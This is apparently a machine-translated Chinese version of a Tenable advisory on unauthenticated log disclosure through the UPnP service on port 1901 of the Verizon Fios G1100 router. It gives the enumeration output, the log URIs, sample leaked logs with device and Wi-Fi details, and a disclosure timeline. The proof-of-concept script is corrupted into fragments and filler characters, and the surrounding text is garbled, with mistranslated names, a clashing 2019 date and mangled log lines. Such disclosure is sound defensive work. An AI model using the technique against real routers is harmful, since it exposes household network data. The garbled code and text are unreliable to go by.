视图全部解决方案VerizonFios量子网关G1100远程信息披露
中度简表
测试NessusUPnP实施时发现Verizon信息披露漏洞fis量子网关G100.G1100有三个监听UPnP服务器一用户可禁用二用户不可本咨询与用户1901端口UPnP服务器相关无法禁止使用服务器优先引起我们的注意 因为它是API列表可见列表输出unpinfo.py
albinolobster@untu:~$pythonunp_info.py[+]发现UPnP位置[+]发现2位置:->http://192.168.1.1:1990/WFDADevice.xml->http://192.168.1.1:1901/root.xmlschemas-upnp-org设备类型:urn:schemas-upnp-org-> Model Name: FiOS-G1100 -> Model Number: FiOS-Gen4 -> Services: => Service Type: urn:schemas-upnp-org:service:BasicManagement:2 => Control: /bms => Events: /bmsEvent => API: http://192.168.1.1:1901/xml/basic_management_service.xml - Reboot - BaselineReset - GetDeviceStatus - SetSequenceMode - GetSequenceMode - Ping - GetPingResult - NSLookup - GetNSLookupResult - Traceroute - GetTracerouteResult - GetBandwidthTestInfo - BandwidthTest - GetBandwidthTestResult - InterfaceReset - GetInterfaceResetResult - GetTestIDs - GetActiveTestIDs - GetTestInfo - CancelTest - GetLogURIs - SetLogInfo - GetLogInfo - GetACLData => Service Type: urn:schemas-upnp-org:service:ConfigurationManagement:2 => Control: /cms => Events: /cmsEvent => API: http://192.168.1.1:1901/xml/configuration_management_service.xml - GetSupportedDataModels - GetSupportedParameters - GetInstances - GetValues - GetSelectedValues - SetValues - GetAttributes - GetConfigurationUpdate - GetCurrentConfigurationVersion - GetSupportedDataModelsUpdate - GetSupportedParametersUpdate - GetAttributeValuesUpdate - GetAlarmsEnabled - SetAlarmsEnabled - GetACLData => Service Type: urn:schemas-upnp-org:service:DeviceProtection:1 => Control: /dps => Events: /dpsEvent => API: http://192.168.1.1:1901/xml/device_protection_service.xml - GetAssignedRoles - GetRolesForAction - GetACLData - AddIdentityList - RemoveIdentity
特别感兴趣的方法GetLoguris广告发布basic_management_service.xml.我们写作Get_log_uris.py来练习GetLogurisAPI
import xml.etree.EplementTree请求导入sysdefCreate_Payload
++
++
++
++
++
++
Lens.argv返回有效载荷
sys.exitxixxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
执行中Get_log_uris.py长得像下方
albinolobster@ubuntu:~$ python get_log_uris.py http://192.168.1.1:1901/bms
logs/dhcp_client,logs/system,logs/dhcp_server,logs/security,logs/firewall,logs/intrusion_detection,logs/parental_control,logs/upnp,logs/sdhl_alert,logs/sdhl_operation,logs/tr69,logs/firmware_update,logs/lpr
服务器响应非认证请求并列URIs假设路由器使用地址192.168.1.1URIs地图定位如下:
- http://192.168.1.1:1901/logs/dhcp_client
- http://192.168.1.1:1901/logs/system
- http://192.168.1.1:1901/logs/dhcp_server
- http://192.168.1.1:1901/logs/security
- http://192.168.1.1:1901/logs/firewall
- http://192.168.1.1:1901/logs/intrusion_detection
- http://192.168.1.1:1901/logs/parental_control
- http://192.168.1.1:1901/logs/upnp
- http://192.168.1.1:1901/logs/sdhl_alert
- http://192.168.1.1:1901/logs/sdhl_operation
- http://192.168.1.1:1901/logs/tr69
- http://192.168.1.1:1901/logs/firmware_update
- http://192.168.1.1:1901/logs/lpr
发现时所有日志都可被远程非认证用户检索(局域网和广域网)。部分信息泄漏包括DHCP信息(设计名、mac地址、局域网IP地址)、无线信息(SSID连接客户端),以及由于防火墙工作方式,局域网设备可能与之通话的地址列表有一些日志样本请注意我确实清理了一些数据
2019年11月20日br-lan:19:282017本地3.info<158>dhpd:DHCPACKEQEST
Nov 20 2017 11:20:28 AM UTC,justlog.tr98.wifi24,ssid,TENABLE_SSID Nov 20 2017 11:20:28 AM UTC,justlog.tr98.wifi24,channel,11 Nov 20 2017 11:20:28 AM UTC,justlog.tr98.wifi24,bssid,ca:fe:c0:ff:ee:00 Nov 20 2017 11:20:28 AM UTC,justlog.tr98.wifi24,x_d4a928_connectionmode,B_G_N Nov 20 2017 11:20:28 AM UTC,justlog.tr98.wifi24,associateddevice,[{x_d4a928_cur-snr=17, associateddevicemacaddress=ca:fe:c0:ff:ee:01, x_d4a928_packetstransmitted=5792358, x_d4a928_packetsreceived=1236, x_d4a928_transceiversetting=NA x 3 : 2, x_d4a928_curtxmodulationrate=117 Mbps, x_d4a928_standard=N, currssi=-62, x_d4a928_currxmodulationrate=130 Mbps, x_d4a928_channel=11, x_d4a928_maxrxmodulationrate=144.4 Mbps, associateddeviceauthenticationstate=true}!{x_d4a928_cur-snr=20, associateddevicemacaddress=ca:fe:c0:ff:ee:02, x_d4a928_packetstransmitted=6474801, x_d4a928_packetsreceived=71558, x_d4a928_transceiversetting=NA x 3 : 2, x_d4a928_curtxmodulationrate=24 Mbps, x_d4a928_standard=N, currssi=-58, x_d4a928_currxmodulationrate=144.4 Mbps, x_d4a928_channel=11, x_d4a928_maxrxmodulationrate=144.4 Mbps, associateddeviceauthenticationstate=true}!{x_d4a928_cur-snr=0, associateddevicemacaddress=ca:fe:c0:ff:ee:03, x_d4a928_packetstransmitted=5869243, x_d4a928_packetsreceived=44419, x_d4a928_transceiversetting=NA x 3 : 1, x_d4a928_curtxmodulationrate=39 Mbps, x_d4a928_standard=N, currssi=-77, x_d4a928_currxmodulationrate=43.3 Mbps, x_d4a928_channel=11, x_d4a928_maxrxmodulationrate=72.2 Mbps, associateddeviceauthenticationstate=true}!{x_d4a928_cur-snr=7, associateddevicemacaddress=ca:fe:c0:ff:ee:04, x_d4a928_packetstransmitted=5792979, x_d4a928_packetsreceived=27111, x_d4a928_transceiversetting=NA x 3 : 1, x_d4a928_curtxmodulationrate=19.5 Mbps, x_d4a928_standard=N, currssi=-71, x_d4a928_currxmodulationrate=26 Mbps, x_d4a928_channel=11, x_d4a928_maxrxmodulationrate=72.2 Mbps, associateddeviceauthenticationstate=true}]
15:37582017LETS=0x00PREC=4109DFP=443DPT=6443SE2226784CK=34899999WINDEW=1175ACKPSG=0MARK=0
Verizon设置信息披露方式禁止WAN访问路由器所有者无需采取任何行动升级,因为路由器自动更新自身可惜这些日志仍为本地网络上任何人访问
求解
保护WAN方面确保使用固件01.04.05.00局域网方面没有修复
披露时间线
2016-09-21-问题发现
2016-10-04-咨询起草
2016-10-04-报告问题
[email protected]cc
[email protected]Verizon.com报告脆弱程度指南
2016-10-04-供应商自译自译
2016-10-05-供应商请求固件版
2016-10-05-可租发送信息
2016-11-24-Ping厂商更新
2017-01-04-Ping供应商更新
2017-01-09-供应商回复
2017-01-09-供应商回复2月固定,提供版本表示Tenable测试版本不正确固定或回归
2017-01-09-Server表示固件编译和修复可能有混淆,
2017-01-11-供应商表示1.04.05.00修复,但测试部署有限交GA后期一月
2017-02-27-Ping商查看软件是否按计划推广
2017-03-01-供应商检验展开状态
2017-03-30-可租确认固件01.04.00.10
2017-08-17-可租测试01.04.00.12
TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响
可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案
关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码
如有问题或更正,请发邮件[email protected]
风险信息
可租咨询ID:TRA2017-35
信用度 :
Jacob Baines网络安全
Jacob Baines网络安全
sv2基础/时间分数
5.0/3.9
5.0/3.9
sv2向量:
AV:N/AC:L/Au:N/C:P/I:N/A:N
AV:N/AC:L/Au:N/C:P/I:N/A:N
受影响产品 :
VerizonFios量子网关G1100
VerizonFios量子网关G1100
风险因子 :
中度
中度
附加关键字 :
VECIRT-368459
VECIRT-368459
咨询时间线
11-2017-[R1]初始发布
11-21-2017-[R2]固定标题